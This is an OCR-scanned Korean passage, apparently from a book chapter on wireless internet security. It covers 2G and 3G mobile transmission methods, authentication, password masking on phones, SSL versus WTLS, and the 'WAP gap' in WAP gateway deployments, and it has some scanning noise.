그러 나 앞에 서 본 다른 수자식 통신방법 들에 서 와 마찬가지 로 CDMA 이 동전화를 리용 
한 인 터네 트대 화도 도청하기 불가능한것 은 아니 다. 앞에 서 와 마찬가지 로 CDMA 수자식신 
호자체 는 도청하기 힘 들지 만 이 무선신호들이 유선신호로 변화되 기만 하면 유선신호들은 
인 터네 트를 따라 가며 도청 당할수 있 다. 말단 대 말단사이 의 암호화를 하지 않고는 무선 
인 터네 트대 화도 인 터네 트를 통한 암호화하지 않은 다른 통신들과 마찬가지 로 위 험하다. 

기타 방법들 

수자식 전송에 는 기 타 방법 들도 있는데 그 대 부분은 이 미 언급한것 들의 파생형 들이 며 
일부는 아직 개발중에 있다. 이 개발중에 있는것들을 가리켜 3세대 즉 3 G 전송방법이라 
고 한다. 2세대 (2 G ) 기술들인 TDMA , GSM , CDMA ♦은 전송속도가 9.6~ 14.4 kbps (키 로비트 
매초)로서 오늘의 보통모뎀속도보다 뜨다. 3 G 기술들은 보다 빠르고 많은 자료를 전송하 
게 끔 설계되 고 있다. 일부는 아마 고속인터네 트접 근뿐아니 라 비 데 오전송도 할수 있을것 으 
로 보인 다. 아래 에 3 G 부류에 속하는것 들을 포함하여 기 타 수자식 전송방법 을 소개한다. 

• / Z ) 及^ V(Integrateel Digital Enhanced Network : 개 선된 수자식 종합통신망)은 TDMA 에 
기초하고 있으며 2 G 전송방법이다. 음성과 자료를 전송하는외에 대공전화기 
( wdkie - talkie ) 처럼 두대의 iDEN 전화사이의 쌍방향라지오통신에도 쓰인다. 

• PDC(Personal Digital Communications : 개 인용수자식통신)는 TDMA 에 기 초한것 으 
로서 일부 나라에 널리 쓰이는 2 G 전송방법 이 다. 

• GPRS(General Packet Radio Service : 일 반파케 트라지 오봉사)는 2.5 G (3 G 는 안되 고) 
기술로서 그 기초는 GSM 이다. 이것은 파케트교환형식의 자료기술로서 《 항상 
직결》적인 접속상태를 유지한다. 즉 하루종일 전화망에 가입상태에 있으면서 
보내거나 받을 자료가 실지 있을 때에만 가입자가 리용한다. 최고자료전송속도 
는 11 5 kbps 이다. 

• 及 Z)G 及 (Enhanced Data rates for Global Evolution : 세 계 공용 자료속도개선체 계)는 
TDMA 와 GSM 에 기 초한 3 G 기 술이 다. GPRS 와 같이 파케 트교환식자료기 술로서 

《 항상 직결》상태 를 유지한다. 최 고자료속도는 384 kbps 로 예 상한다. 

• t / MrS(Universal Mobile Telecommunications System : 국제 이동통신체 계)는 GSM 에 
기초한 3 G 기술이 다. 최고자료전송속도는 2 Mbps 로 예상된다. 

• CDMA 2000^ W - CAMA(wideband CDMA : 광대역 CDMA ) 는 두가지 다 CDMA 에 
기 초한 3 G 기 술들이 다. CDMA 2000은 북아메 리 카설 계 안이 고 W-CDMA 는 유럽 과 
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일 본식 설 계안들이다. 둘다 최 고자료속도가 저 속이 동전화일 때 384 kbps 이 고 고정 
전화일 때 2 Mbps 이다. 

그 속도나 방법에는 관계없이 이동전화와 인터네트 혹은 인트라네트싸이트사이에 비 
밀성을 보장하자면 반드시 말단 대 말단암호화를 해 야 한다. 무선인터네트통신은 무선과 
유선전송을 다 포괄하기때문에 무선통신부분만을 포괄하는 암호화는 분명히 충분하지 못 
하다. 말단 대 말단비밀보장을 위 해서는 응용프로그람들과 규약이 일정한 역 할을 수행해 
야 하는데 이에 대해서는 후에 설명하기로 한다. 

무선장치들은 어느 정도 안전한가 


오늘날 기업망에서 적용되고 있는 인터네트보안은 사실 여러가지 리유로 하여 무선 
전화와 PDA 에 응용하기 힘들다고 할수 있다. 이 기구들은 CPU , 기억기，대역너비，보관 
능력이 제한되여 있다. 결과 속도가 뜨며 계산능력이 제한되여 있다. 보통의 콤퓨터에서 
는 1초도 안걸 리 는 강력한 보안성 능들이 무선기 구들에 서 는 몇분이 나 걸 리 므로 쓰기 불편 
할뿐아니라 비현실적이기도 하다. 이 기구들의 능력이 일반적인 워크스테이션하드웨어 능 
력의 몇분의 일밖에 안되기때 문에 인터네 트보안의 견지 에서 보면 이 무선기구들의 보안 
특성들은 경량형 아니면 아예 없는것이나 같다. 그러나 이 기구들을 리용하여 기업의 인 
트라네 트기 밀 에 접 속도 하고 있 으며 이 동형 상 거 래 나 은행 거 래 도 하고 있 다. 이 무선 장치 
들이 어느 면으로 보나 작지만 그 보안상 요구는 이전과 같이 매우 중요하다. 이 무선설 
비들이 회사망에 널리 퍼지게 되는것과 관련하여 만일 회사의 정보기술 및 정보보안부서 
들이 이 무선설비들을 홀시하게 되는 경우 이것은 하나의 큰 실책이 될수 있다. 결국 이 
장치들도 차별이 없다. 즉 설계를 어떻게 하는가에 따라 망의 그 어느 부분처럼 회사정 
보에 도청을 할수 있다. 이 장치들과 관련한 보안상 측면의 일부를 여기서 설명하자. 

인증 

무선전화사용자를 인증하는 과정은 지금까지 몇해동안의 실천과 발전단계를 거쳤다. 
무선봉사의 도난을 막기 위하여 봉사제 공자들이 여 러해동안 기 울인 노력 을 놓고 보더 라 
도 인증과정 은 오늘날 수자식이 동전화의 가장 강력한 보안특성 의 하나로 될 것 이 다. 자기 
들이 제공하는 전화봉사의 사용자에게 료금을 받아 내는것은 봉사사용자들이 매우 관심 
하는 문제 이 기 때 문에 이 동전화사용자인증은 최 고의 중요성 을 가진다. 

앞에서 언급한바와 같이 GSM 전화는 사용자인증정보를 담은 SIM 카드나 소편을 사용 
한다. SIM 에는 흔히 인증 및 암호화열쇠들, 인증알고리듬，식별정보，사용자전화번호 등이 
있다. 이 것을 가지 고 사용자는 자기 전화와 자기 가 가입한 전화망에 대 한 인증을 한다. 

북아메리카에서는 TDMA 와 CDMA 전화들이 GSM 과 같은 복잡한 인증방법을 사용한 
다. GSM 과 마찬가지로 이 인증방법은 열쇠，인증쎈터，문제-대응기법 등을 혼용한다. 그 
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러 나 TDMA 와 CDMA 전화들은 외 장식 SIM 카드나 소편을 리용하지 않으므로 이 전화들욘 
대 신 전화기 에 내 장된 인증정보에 의거한다. 사용자의 신원은 결국 이 하나의 전화안에 
다 있는셈이다. 

뚜렷한 약점이라고 볼수 있는것은 인증에서 TDMA 와 CDMA 전화들은 GSM 전화에 
비해 그 유연성 이 적은것 이 다. GSM 전화에 새 사람을 인증시키 려면 많은 경우 SIM 카드 
나 SIM 소편만 갱신하면 다 된다. 그러나 TDMA 와 CDMA 에서는 새 사람을 인증시키려면 
비용이 많이 들어도 새 전화를 사용하는수밖에 없다. 전화를 하나 사는것보다 외장소편 
을 갱신하는것 이 더 쉬우므로 결국 GSM 에서 제공되는 보안특성들과 혁신안들을 더 람 
구해야 할것으로 예견된다. 

그러 나 여기 에서 중요한 문제는 이 러한 행위의 인증이 인터네트상에서의 거 래 에서는 
잘 적용되지 않는다는것이다. 이 방법의 인증은 이동전화사용자를 봉사제공자의 전화망 
에 인증시키는 역 할밖에 못한다. 바로 이 망은 인터네 트상에서의 거 래 에서 한 부분에 지 
나지 않는것 이 다. 말단 대 말단인 터네 트거 래 를 안전 하게 하자면 사용자는 자기 가 접 속하 
는 인터네트 Web 봉사기를 인증하여 그 봉사기가 합법적인가를 확인해야 할것이다. 마찬 
가지 로 인 터네 트 Web 봉사기 로 자기 에 게 접 속하는 무선사용자를 인증하여 그 사용자가 
합법적인가 아니면 위장한 사용자인가를 확인해야 한다. 그러나 무선봉사제공자들은 이 
동전화로부터 인 터네 트 Web 봉사기 까지 의 완전한 말단 대 말단인증제 공을 거 의 하지 않 
고 있다. 그 책임은 흔히 안터네트 Web 봉사기와 Web 응용프로그람의 소유자들의 몫으로 
된 다. 

말단사이의 인증을 제공하는 여러가지 방법들은 오늘날 응용준위에서 시험되고 있다. 
안전한 이동형상거래응용프로그람들은 대체로 신원과 통과암호와 갈은 낡은 식을 사용하 
고 있는데 이것들은 단일요소인증만을 제공하기때문에 제한성이 있다. 다른 연구기관들 
에서는 sm 에 공개 및 비밀열쇠쌍，수자식인증서를 비롯한 PKI 요소들과 같은 보안사항 
들을 추가함으로써 GSM , SIM 에 대 하여 실험중에 있다. 

그러나 수자식 인증서사용은 공정에 부하가 많이 걸리므로 이동전화와 손에 드는 형 
식의 기구들에는 대체로 이 보안요소들의 경량관을 쓴다. 무선기구들에 있는 작은 처리 
장치 들에 맞게 하기 위하여 수자식 인증서 와 그와 관련된 공통열쇠 들은 무선장치의 자원 
에 따라 탁상형콤퓨터 Web 열람기에 설치된것들보다 더 작거나 더 약할수도 있다. 

또한 일부 기관들에서는 무선장치들에서의 인증，수자식 인증서，공통열쇠암호화에 대 
하여 타원곡선암호화 ( ECC ) 라는 방법 도 시 험 중에 있 다. ECC 는 강력한 암호화기 능이 있 으 
면서도 다른 암호화기 능처 럼 계 산자원을 덜 쓰기때 문에 이동통신기 구들에 있어서 매우 
리상적인 도구로 된다. 무선기구들에 ECC 를 사용하는데서 앞장 서고 있는 업체들중의 
하나는 Certicom 회 사이 다. 

무선인터네트인증과 관련한 기술이 점 점 더 발전해감에 따라 어느 때 인가는 인차 인 
터네 트이동통신기 구들이 통표，스마트카드，은행 의 ATM 카드처 럼 일 식 으로 된 인증장치 
로 될 것 이 라는것 은 명 백하다. 만일 사용자들이 이 향상된 이 동통신기 구들을 리용하여 인 
터네 트상 거 래를 시 작한다면 이 장치들을 도난 당하거 나 잃지 않도록 하는것 이 선차적 인 
요구로 나선다. 외장식 SIM 이나 내장식기구에 담겨 진 신원정보를 잃어 버 린다는것은 그 
것을 가지 고 다른 자가 자기 처 럼 위 장하여 전자상업거 래를 진행할수 있다는것을 의미한 


119 




다. 이동장치에서는 그 사용자가 그것의 전반적보안에서 가장 큰 역할을 한다. 인터네트 
접근과 내장식공통/비밀열쇠쌍이 들어 있는 이동전화를 잃어 버린다는것은 은행의 ATM 
카드와 그 카드우에 쓴 HN 을 함께 잃 어 버리 는것 만큼 파국적 이 거 나 그보다 더할수도 
있다. 만일 이러한 기구를 잃어 버렸다면 봉사제공자에게 신속히 그 분실사실과 그 사용 
중지를 통고하여 야 한다. 

비밀성 

무선장치에서의 비밀성보존에는 여러가지 흥미 있는 난점들이 제기된다. 열람기로 
Web 싸이트에 접근해 들어 가려고 통과암호를 칠 때 대체로 쳐넣는 통과암호는 별표모양 
이나 빈 자리모양으로 숨겨 져 나타나서 옆의 사람들이 본인이 쳐넣는 실지 통과암호를 
화면상에서 보지 못하게 된다. 이동전화나 손에 드는 장치들에서는 통과암호를 가리우는 
것이 타자할 때 문제점들을 일으킬수 있다. 이동전화에서 문자입력은 수자건반으로 하는 
데 이 방법 은 시 끄럽 고 지 투하다. 실례 로 문자 요를 입 력 하려 면 수자 7을 세 번 눌러 야 정 
확한 문자가 입력된다. 입력결과가 가리워 지게 하면 무슨 글자가 실지 입력되였는지 사 
용자는 알수가 없다. 이러한 불편한 점이 있으므로 일부 이동인터네트응용에서는 이 마 
스크기능을 없애고 전체 통과암호가 실지 글자로 화면에 직접 현시되게 한다. 일부 응용 
에서는 처음에는 통과암호의 매 글자가 타자치는 몇초동안 직접 현시되였다가 다음에는 
인차 매 글자가 빈칸으로 가리워 진다. 이렇게 하면 사용자는 정확한 글자가 입력되였는 
가를 알고저 하는데도 좋으며 그것을 인차 가리우게 할 필요성도 만족시켜 줌으로써 개 
인적비밀을 보장해 준다. 이 후자의 방법 이 짐 작건대 두가지중에서 보다 유망한것 으로 
보이며 응용프로그람설계 가들이 도입해 야 할 방법 이 라고 본다. 

비밀성보장에서 또하나의 문제는 통과암호나 신용카드번호 같은 극비정보들이 이동 
장치를 사용한 다음에는 그 기억기에서 소멸되게끔 하는 문제이다. 많은 경우 무선인터 
네트응용에서는 이러한 기밀정보들이 변수로 보관된 다음에는 그 장치의 기억기에 숨겨 
진다. 이동전화기에 남아 있던 신용카드번호를 그 전화기를 빌려 쓴 사람이 다시 리용하 
였다는 자료들도 있다. 다시한번 응용설계 가들은 여 기서 각성하여 비밀성 보장에서 주인 
이 되여야 한다. 프로그람작성자들이 사용후 이동전화의 기억기에서 기밀정보들이 소실 
되 게끔 응용프로그람을 설계하는것 이 중요하다. 물론 이 런 정 보들을 기 억기 에 그냥 남겨 
두면 다음번에 그것을 다시 입 력하는 품을 덜수 있지 만 이 렇게 하는것은 자기의 은행 
ATM 카드에 해 당 Pm 을 써 놓는것 과 득같이 위 험하다. 

다른 또하나의 문제 는 인터네 트상에서 무선장치 로부터 목적 지 까지 의 정 보흐름 전 구 
간에 걸 쳐 기 밀정 보의 비 밀성 이 보장되 게 하는것 이 다. 전통적 으로 보면 유선인터네 트에 
서는 거의 모든 Web 싸이트들이 안전소케트층 ( SSL ) 규약이나 그 후신인 통신층보안 ( TLS ) 
규약을 리용하여 의뢰기 로부터 Web 봉사기 까지의 말단 대 말단의 전체 구간을 암호화한 
다. 그러 나 많은 무선장치 들 특히 이 동전화는 SSL 을 충분히 실 행할만큼한 계 산능력 과 대 
역너 비를 가지 고 있지 못하다. SSL 의 주요구성요소의 하나는 RSA 공개열쇠암호화이다. 
해 당 Web 싸이트에 적 용되 는 암호화강도에 따라 이 형 태의 공개열쇠암호화가 처 리기 에 
부하를 줄수도 있고 대역너 비 에 부하를 줄수도 있으며 그리하여 통과가 너무 느려 계속 
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하지 못할 정도로 그 장치를 혹사시 킬수 있다. 

대 신 무선응용규약 ( WAP ) 을 리용하여 개 발한 무선 인 터네 트응용프로그람은 여 러 가지 
보안규약을 종합하여 쓰고 있다. 안전한 WAP 응용프로그람들은 SSL 과 WTLS (무선통신층 
안전규약)를 다같이 리용하여 서 로 다른 마디 의 안전전송을 보호한다. 표준적 으로 SSL 은 
유선구간을 보호하며 WTLS 는 주로 무선구간을 보호한다. 말단 대 말단 암호화와 맞먹는 
것 을 얻 자면 두가지 를 다 리용해 야 한다. 

WTLS 는 동작상 SSL 과 류사하다. 그러 나 WTLS 가 RSA 나 ECC 중의 하나를 지원하지 
만 ECC 가 더 좋다. 그것은 ECC 가 강한 암호화기능들이 있으면서도 RSA 보다 밀집도가 
더 좋으며 속도도 더 빠르기때문이 다. 

WTLS 는 또한 SSL 과 다른 차이점을 가지고 있다. WTLS 는 속도가 느리고 자원에 대 
한 부하가 적은 환경에서 암호화를 진행하지만 SSL 은 이러한 환경에는 무리를 줄수 있 
다. 그것 은 SSL 암호화에 는 믿 음직한 통신규약 특히 TCP ( TCP / IP 의 일부분인 송신조종규 
약)가 필요하기때문이다. TCP 는 오유람지，통신수락통지，재송신기능들이 있으므로 송신 
과 수신에서 신뢰성을 보장한다. 그러나 이 기능으로 하여 TCP 는 보통 무선설비들보다 
더 많은 대역너비와 자원을 소모한다. 대부분의 이동통신결선들은 오늘날 대역너비가 좁 
고 속도가 느리 며 TCP 가 만들어 내 는 부단히 가고오는 오유람지전송량을 처 리하게 끔 되 
여 있지 못하다. 

이 제한성들을 인식하고 WAP 의 표준화를 추진할 책임을 맡고 있는 단체인 WAP 연 
단은 무선환경에 보다 적합한 보충적인 규약묶음을 내놓았다. 이 환경이 대개 접속속도 
가 낮고 신뢰도가 낮으며 대역너비도 좁기때문에 이것들을 보충하기 위하여 그 규약묶음 
은 압축된 2진자료대 화를 리용하며 불균일 한 포괄구역 에 대 해서 허 용도가 높다. WAP 규 
약묶음은 OSI 참조모형 의 4，5，6，7계 층들에 속한다. WAP 규약묶음은 IP 형 망들에 서는 
UDP (사용자데타그램규약)와 협동하며 비 IP 형망에서는 WDP (무선데타그램규약)와 협동한 
다. WAP 규약묶음에 속한 보안규약인 WTLS 는 무선환경에서 UDP 나 WDP 전송을 보호하 
는데 쓰인다. 

WTLS 과 SSL 사이의 이러한 차이 그리고 그것들의 작업환경상 차이로 하여 하나의 
환경에서 다른 하나의 환경에로 이동되는 전송자료들을 변환해 주는데 관문과 갈은 중간 
장치가 필요하다. 이 관문을 흔히 WAP 관문이라고 한다. 이 WAP 관문에 대해서는 하부시 
설부분에서 구체적으로 설명하기로 한다. 

악성쿄드와 비루스 

워 크스테 이 션들과 봉사기 들에 대 한 수많은 공격 들에 비해 보면 무선장치 들의 보안에 
대한 공격회수는 지금까지 적다. 이것은 부분적으로는 악성코드와 비루스가 교묘하게 리 
용할수 있는 충분한 처리기，기억기나 보관기가 이동전화 갈은 대부분의 이동통신장치들 
에 없다는 단순한 사실과 관련되 여 있다. 실례 로 오늘날 비 루스를 퍼뜨리 는 인기 있는 
방법 은 전자우편뒤의 첨 가파일에 비루스를 숨기는것 이 다. 그러 나 이동전화 같은 대부분의 
이동통신장치들은 전자우편의 추가파일을 보관하거나 열어 볼 능력 이 없다. 이것으로 하 
여 파괴 적 인 잠재 력 이 비 교적 낮은 무선장치 들은 공격 대상으로는 상대 적 으로 적 합하지 
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않다. 

그러나 계산능력，기억능력，보관능력이 더욱더 커짐에 따라 이동통신장치들에 대한 
공격가능성은 더욱 높아 질것이다. 속도가 더 높아 지고 내리적재능력이 더 빨라 지고 
처리가 더 개선되면 이동통신장치들은 오늘날의 워크스테이션처럼 해커들에게 좋은 먹이 
감으로 될수 있을것이다. 이 장의 집필당시 이동전화제작업체들은 다음세대 이동전화들 
이 자바와 같은 언어들을 지원함으로써 사용자들은 일정계획프로그람，계산프로그람，유 
희프로그람들을 자기 들의 Web 용전화들에 내 리 적재할수 있을것 이 라고 이미 발표하고 있 
었다. 그러나 부정적인 견지에서 보면 이렇게 되면 사용자들이 자기도 모르게 악성프로 
그람(즉 《 악성 웨어》)들을 자기들의 무선통신도구들에 내 리적재하게 될수 있는 가능성 
이 많다는것이다. 다음의 격언이 무선기구들에 꼭 맞는다.《두뇌들이 많을수록 더 큰 목 
표로 되기 쉽다.》 


망하부시설들은 어느 정도 안전한가 


정보보안분야에서 오래동안 일해 온 사람들이 알다싶이 보안은 많은 구성요소들의 
집합으로 이루어 지나 그 총체적세기는 바로 가장 약한 고리가 얼마나 센가 하는데 달려 
있 다. 때 로는 망에 서 가장 강력한 암호화기 술을 쓰고 말단장치 에 서 가장 강력한 인증기 
술을 리용해도 소용없이 되는 경우도 있다. 전반적 인 련쇄고리중에서 그 어느 곳이든 약 
한 고리가 있으며 공격자들은 이 취약점에 집중공격을 들이대여 마침내는 녹여 내고 최 
소의 노력 에 최 소의 자원 이 필 요한 경 로를 택하게 된 다. 

무선인터네트세계는 아직 상대적으로 청소하고 발전도상의 분야이므로 정도의 차이 
는 있겠으나 취약성은 허다하다. 여기에서는 WAP (무선응용규약)를 사용하는 사람을 위 
하여 일부 하부시설의 취 약점들을 집중적으로 보기로 한다. 

WAP 에 있는 빈 구석 

암호화는 전자상업거래세계에서 정말 귀중한 도구로 되여 왔다. 많은 직결기업들은 
SSL 이나 TLS 를 리용하여 전 구간의 암호화를 진행함으로써 의뢰기와 Web 봉사기사이의 
인 터네 트거 래 를 보호한다. 

그러 나 WAP 를 사용할 때 대 화를 위한 암호화가 설정되면 여기 에는 두가지 구역의 
암호화 즉 전송의 서 로 다른 V2 을 보호하는 암호화가 적용되게 된다. SSL 이 나 TLS 는 주 
로 Web 봉사기 와 이 미 실행한 WAP 관문이 라고 하는 중요한 망장치사이 의 첫 구간만 보 
호하게 된다. WTLS 는 WAP 관문과 무선이동통신장치사이의 두번째 구간을 보호한다. 

이 WPA 관문국은 무선전송에 부합되게 유선신호를 대역너비부하가 적고 압축된 2 
진수형태로 변환하는데 필요한 하부시설구성요소이다. SSL 과 같은 암호화가 대화과정 
에 리용되 면 WAP 관문은 이 SSL 전송자료를 복호화하였 다가 다시 그것 을 WTLS 로 재 
암호화하며 반대 방향인 경 우에 는 이 과정 을 거 꾸로 거 침 으로써 SSL 에 의하여 보호되 
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는 전송을 변환해 주게 된다. 이 변환은 몇초밖에 걸리지 않는다. 그러나 이 짧은 과정 
에 그 자료는 WAP 관문의 기 억 기 에 복호화되 고 평문으로 앉아 있 다가 비 로소 두번째 
규약을 리용하여 재암호화되 게 된 다. 일 부 사람들이 《 WAP 의 빈 구석》이 라고 부르는 
WAP 관문에서의 이 짧은 공간은 해커의 공격을 받을수 있는 하나의 취 약점 이다. 결국 
WAP 관문이 어 디에 위 치하고 있는가，얼마나 안전하게 관리되는가，누가 그 보호책임 
을지고 있는가에 달려 있다. 

명백히 말하여 WAP 관문은 안전한 환경에 위치하고 있어야 한다. 그렇지 않으면 그 
관문에 접 근하려 는 침 입 자가 평문으로 되 는 순간에 기 밀 자료들을 도적 질 할수 있 다. 또한 
침 입 자는 관문에서 암호화과정 을 교환시 킬수 있으며 지 어 봉사거부공격 을 유발시키거 나 
이 기 구에 기 타 악성공격도 들이 댈수 있다. 비 법접근으로부터 관문을 지키는것 뿐아니 라 
그 보안상태를 향상시키기 위하여서는 또한 운영절차도 잘 지켜야 한다. 실례로 복호화 
와 재암호화과정 이 진행 될 때 평문자료를 디 스크기 억 매 체 에 보관하지 않는것 이 좋다. 이 
자료를 사용기 록파일 에 보관하는것 도 역 시 공격 자들에 게 불필 요하게 공격호기 심 을 가지 
게 하는것 으로 될 수 있 다. 또한 복호화와 재암호화는 반드시 기 억 상에 서만 진행 되 여 야 
하며 그것도 가능한껏 빨리 진행되여야 한다. 뿐만아니라 우발적인 로출을 방지하기 위 
하여 기 억기는 정 확히 덧쓰기를 진행하게 함으로써 그 어떤 기밀자료도 다 소실된 다음 
에 야 그 기 억 기 가 재 리용될 수 있 게 하여 야 할것 이 다. 

WAP 관문전개구조 

자료의 기밀성과 그 자료의 비법적인 공개에 대한 법적책임성문제가 제기되여야 안 
전한 무선봉사업체(고객들도 같이)들은 WAP 관문이 어디에 위치하고 있으며 어떻게 보호 
되 고 있으며 누가 그것 을 보호하고 있는가에 대 하여 우려하게 된다. 세 가지 가능한 전개 
구조와 그 보안내용에 대하여 구체적으로 보자. 

봉사제공자에 위치한 WAP 관문 대부분의 경우 WAP 관문들은 무선봉사제공자들이 소 
유하고 운영한다. 안전한 무선응용체 계들을 리용하고 있는 많은 기업들은 오늘날 이 러한 
봉사제 공자들의 WAP 관문에 의 거하여 SSI ᅲ WTLS 응용체 계 들을 소유한 기 업 들과 그 사용 
자들이 WAP 관문과 그것을 통과하는 기밀자료들을 바로 이 무선봉사제공자들이 안전하 
고 사고없 이 지 켜 주기 를 알고 있 다는것 을 의 미한다. 그림 8-1 에 서 는 WAP 관문봉사제 공 
자들의 안전환경안에 있는 설치형 태를 보여 주고 있다. 사용자의 이동전화와 기 업의 방 
화벽뒤에 있는 응용봉사기사이의 대화에 암호화가 적용된다면 그 이동전화와 봉사제공자 
의 WAP 관문사이 의 구간에 대 한 암호화는 WTLS 가 해 준다. WAP 관문과 기 업호스트의 응 
용봉사기 사이구간의 암호화는 SSL 이 나 TLS 를 리용하여 한다. 

이러한 설치방식으로 안전한 WAP 응용체계들을 전개하는 기업이 알아야 할것은 짧 
은 순간이 나마 복호화되 여 평문상태 로 있 다가 다시 암호화되 는데 이 과정 이 회 사자체 의 
관할밖에 있는 관문에서 진행되는것이므로 자료의 말단간보안은 담보될 수 없다는것이다. 
WAP 관문은 대개 무선봉사제공업체의 자료쎈터안에 전개되여 있으며 그 기업에 직접적 
인 책 임을 지지 않는 사람들이 관리한다. 물론 WAP 관문을 안전하게 그리 고 안전한 자리 
에 보존하는것은 봉사제공자의 최상의 리익에 부합되는 일이다. 
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그림 8-1. 봉사제공자에게 있는 WAP 관문 

때 로는 그 신뢰 를 확인보강하기 위하여 기 업 들은 봉사제 공자의 WAP 관문운영 실 태 
에 대 한 정기적 인 보안검 열을 진행하여 위험요소들이 최소화되게끔 할수도 있다. 그러 
나 기업들이 검사해야 할 WAP 관문수는 봉사제공자수가 많으므로 상당한 수에 달한다. 
봉사제공자나 WAP 관문을 설치한 주되는 목적은 무선전화가입 자들에게 인터네트접근 
봉사를 하려는데 있다. 가령 사용자들이 한 기업의 안전한 Web 싸이트를 무선전화로 방 
문한다고 할 때 전 세계적으로 20개소의 무선봉사제공업체를 통해 야 한다면 그 기업은 
이 20개소의 봉사제공자들에 속하는 WAP 관문들을 모두 검사해야 한다. 이것은 말그대 
로 엄청난 과제일뿐아니라 보안담보의 실천적인 방법이 못된다. 매 봉사제공자 역시 
각이한 방법 으로 자기 들의 WAP 관문을 보호할것 임 은 틀림 없 다. 더우기 대 부분의 경 우 
무선봉사제공자들은 자기의 이동전화가입자들앞에 책임을 지지 그 어떤 계약관계가 없 
는 한 안전인터네트응용체계를 가지고 있다고 하여 그 무수한 기업들앞에 책임을 질 
필요는 없는것이다. 

호스트에 위치한 WAP 관문 금융，보건，정부기관들을 비롯한 일부 기관들과 업체들은 
자기의 고객들의 기밀자료들을 보호해야 할 법적의무를 지니고 있다. 기관의 내부통제권 
밖에 이러한 기밀자료들이 로출되게 되면 불필요한 위험 및 그 법적손해에 대한 책임이 
제기된다. 일부 기관들에 있어서 《WAP 빈 구석》은 깨진 송유관과 비슷하여 이 비밀을 
어서 가져 가 달라고 하는것과 갈은 완전한 비밀성의 위반으로 된다. 이러한 현상을 극 
복하는데는 하나의 가능한 방도 즉 WAP 관문을 기업의 호스트자 체의 보호된 망에 설치 
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하여 무선봉사제공자의 WAP 관문을 완전히 무시하는 방도가 있다. 그림 8_2에 이러한 
설치 방식의 례를 주었다. Nokia , Ericsson , Ariel Communications 회사들은 이러한 대 안을 제 
공하는 대 표적 인 판매 업 체 이 다. 

이 방식을 쓰면 WAP 관문과 그 WTLS-SSL 변환과정 이 안전한 Web 응용을 제공하는 
그 기관내의 신뢰성 있는 위치에서 보호되고 진행된다는 장점이 있다. 이 방식에서 사용 
자는 무선전화기에서 번호판을 돌려 직접 봉사제공자의 공공교환전화망 ( PSTN ) 을 거처 
기 업의 원격접근봉사기 ( RAS ) 로 들어 온다. 일 단 RAS 에 들어 오면 전송이 계속 이 어 져 
WAP 관문을 거 쳐 응용봉사기 나 Web 봉사기 에 도달하는데 이 모든 기 구들은 다 기 업 호스 
트자체 의 안전환경내 에 위 치 하고 있 다. 



이 방식 이 말단사이 의 보안을 더 좋게 하지 만 약점 이 있는데 그것 은 기 업호스트 
가 사용자들이 충분한 접 근점 을 가지 도록 수많은 모뎀 들과 RAS 를 설 치하지 않으면 
안된다는 점이다. 또한 그 기업이 봉사제공자의 WAP 관문대신 자기 WAP 관문에로 직 
접 들어 오게끔 매 사용자들의 이 동전화와 PDA 들을 재 설정해 주지 않으면 안된다는 
것 이 다. 그런데 모든 이동전화들이 사용자에 의한 재 설정 을 다 허 용하는것 도 아니 다. 
게 다가 일 부 이 동전화들은 오직 하나의 WAP 관문만 지 적하게 되 여 있 으며 일 부는 다 
행스럽게도 하나이상을 지적하게 되여 있다. 두 경우다 기업자체의 WAP 관문을 지적 
하게 끔 모든 무선장치 들을 개 별적 으로 재 설정해 주는것 은 품과 시 간이 상당히 들수 
있 다. 

오직 하나의 WAP 관문만 지 적하게 된 이동전화의 사용자들에게 있어서 이 재 설정은 


125 






또 하나의 문제 점 이 다. 이 사용자들이 인 터네 트상의 다른 WAP 관문에 접 근하려 면 그 기 
업호스트의 WAP 관문을 먼저 통과해 야 한다. 만일 그 호스트가 밖으로 나가는 전송자료 
를 허 용하면 그 호스트는 자기 WAP 관문지적을 새 로 설정한 이 사용자들에 게 있어서 하 
나의 인 터네 트봉사제 공자로 된 다. 림 시 ISP 로 역 을 해 야 하는 호스트로서 는 불가피 하게 
통신문제 와 사용자관계문제 까지 돌보아 주어 야 하며 결국 상당한 량의 자원소모로 하여 
청하지 않은 부담을 걸 머 지 게 된 다. 

봉사제공자의 WAP 관문으로부터 호스트 WAP 대리자 ( proxy ) 에로의 경유 말단사이 안전암 

호거 래는 바라지 만 자체의 WAP 관문을 설치해 야 되 는 행정적두통거 리를 안고 있는 기 업 
들에 있어서 일련의 다른 방도도 있다. 



그림 8-3. 봉사제공자의 WAP 관문에서부터 호스트의 
WAP 대리자에로의 경유 


그림 8_3 에서 보는바와 같이 이러한 한가지 방도로서는 WTLS 로 암호화된 자료 
를 변환시키지 않고 사용자의 이동전화로부터 봉사제공자의 WAP 관문을 경유시키는것 
이 다. 기 업호스트자체 의 안전한 망내 부의 두번째 WAP 관문 비 슷한 장치 에 이 암호자 
료가 도달할 때까지 WTLS-SSL 암호화변환은 진행되지 않는다. 이 방안을 현재 개발 
하고 있는 하나의 업체는 Openwave Systems(Phone.com 파 Software.com 의 결합체)이다. 
이 업체는 이 두번째 WAP 관문 비슷한 장치를 안전기업대 리 자라고 부론다. 암호화된 
전 대화기간 봉사제공자의 WAP 관문과 기업의 안전기업대리자는 서로 잘 협동하여 이 
암호화된 자료를 변함이 없 이 안전기업 대 리 자에 넘 겨 준다. 이 방안에서 봉사제 공자 
의 WAP 관문을 쓰게 되는 리유는 이것이 이동통신사용자들에게 정확한 인터네트접근 
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을 보장하면서도 WTLS - SSL 암호변환은 하지 않으며 따라서 기밀자료를 루설할 가능 
성 이 없기때 문이 다. 

복호화작업 은 기 업의 안전망안에 있는 안전기업대 리 자나 응용봉사기 에서 진행된다. 

그러나 이 방법의 한가지 결함은 그것 이 독점적성격을 떤다는데 있다. 이 글을 집필 
하는 당시 에 는 Openwave 사의 해 결 책 이 은을 내 게 하기 위 하여 세 개 소에 서 Openwave 회 
사의 독점 적 부품들을 전개해 야 하였 다. 무선봉사제 공자는 Openwave 의 최 신 WAP 관문을 
구입하여 사용해 야 하며 안전응용을 제공하는 기 업은 Openwave 의 안전기업체대 리자를 
사용해 야 그 WAP 관문과의 암호화경유과정을 순조롭게 해결할수 있다. 게 다가 무선장치 
들자체도 역시 Openwave 의 Web 열 람기，적 어도 Micro-browser 제5판을 리용해 야 한다. 전 
세 계 에서 WAP 를 리 용하는 전화들의 70%가 Openwave 의 Micro - browser 관들을 리용하지 
만 대부분의 이 전화들은 3판이나 4판을 쓰고 있다. 그런데 이 현존 열람기들은 대부분 
사용자에 의한 판본갱 신 이 안되 게 되 여 있 어 모든 사용자들이 이 대 안을 리용하려 면 전 
